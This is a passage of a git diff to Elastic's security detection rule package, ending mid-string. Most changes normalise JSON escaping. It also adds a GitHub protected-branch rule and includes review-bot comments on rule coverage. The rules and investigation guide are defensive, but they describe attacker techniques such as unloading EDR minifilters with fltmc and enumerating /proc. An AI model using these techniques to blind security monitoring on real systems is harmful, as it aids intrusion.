Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n",
 "related_integrations": [
 {
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json
index 31d7a482d00..cffaa1262b0 100644
--- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json
index d88d0a0bd8a..f58cf4ab936 100644
--- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json
index 2a737a5cc02..f8e27d76c06 100644
--- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json
index a6b7b964408..8ad1132f538 100644
--- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json
index 5d7c796a45f..2ead17335b7 100644
--- a/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json
@@ -46,7 +46,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_2.json b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_2.json
new file mode 100644
index 00000000000..faa93f82cb7
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_2.json
@@ -0,0 +1,77 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects setting modifications for protected branches of a GitHub repository. Branch protection rules can be used to enforce certain workflows or requirements before a contributor can push changes to a branch in your repository. Changes to these protected branch settings should be investigated and verified as legitimate activity. Unauthorized changes could be used to lower your organization's security posture and leave you exposed for future attacks.",
+ "from": "now-9m",
+ "index": [
+ "logs-github.audit-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "GitHub Protected Branch Settings Changed",
+ "query": "configuration where event.dataset == \"github.audit\" \n and github.category == \"protected_branch\" and event.type == \"change\" \n",
+ "related_integrations": [
+ {
+ "package": "github",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "github.category",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "07639887-da3a-4fbf-9532-8ce748ff8c50",
+ "severity": "medium",
+ "tags": [
+ "Domain: Cloud",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Github"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+ },
+ "id": 
"07639887-da3a-4fbf-9532-8ce748ff8c50_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json
index 615f3d6625e..66fca33e6d1 100644
--- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json
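Review bot: The new rule's query keys on `event.type == "change"`, so whether the outright removal of a branch protection rule (GitHub's `protected_branch.destroy` audit action) is caught depends on how the github integration maps that action into `event.type`; if it lands as `deletion` rather than `change`, the most damaging case, protection gone entirely, never alerts, which contradicts the description's stated intent of catching changes that lower the organization's posture. Worth confirming against the integration's ingest pipeline and, if so, widening the filter to `event.type in ("change", "deletion")` (and adding `deletion` to the `required_fields` documentation accordingly). The rule also ships without a `note` investigation guide, unlike the sibling rules in this package; a short guide telling analysts to identify the actor and repository, the specific setting changed (required reviews, required status checks, force-push or branch-deletion allowances), and whether a change-management record covers it would make these medium-severity alerts actionable and give a concrete false-positive path for routine admin edits.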
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type : \"linux\" and event.category : \"file\" and event.action : \"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.parent.pid : 1\n", "required_fields": [ { 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "OS: Linux", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json index ab42f6d31b3..913ff49263e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json 
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type : \"linux\" and event.category : \"file\" and event.action : \"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : \"pidof\" and \nnot process.parent.pid : 1\n", "required_fields": [ { 
@@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json index 20384b20898..8bb394db08c 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json 
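Review bot: The only edit in the threat-block hunk here is the serializer's output — `\u0026` and `\u003e` become literal `&` and `>` inside JSON strings, which decode to identical values, so Kibana imports the same rule and the logic is untouched. The escaped form is what an HTML-safe JSON encoder emits by default, so this presumably reflects a change in the exporter's settings rather than in the rules; if that setting is not pinned where the package is generated, the next release would flip every rule file back and bury real rule changes in the same noise. Recording the exporter setting in the package's build notes, or adding a CI check that rejects `\u0026`/`\u003e` in these files, would keep the normalization stable. The same edit recurs in every threat-block hunk visible here (L118 through L136).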
@@ -14,7 +14,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type : \"linux\" and event.category : \"file\" and event.action : \"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : \"pidof\" and \nnot process.parent.pid : 1\n", "required_fields": [ { 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json index 8f43171f22e..1ef8d7ec11e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json 
@@ -14,7 +14,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to 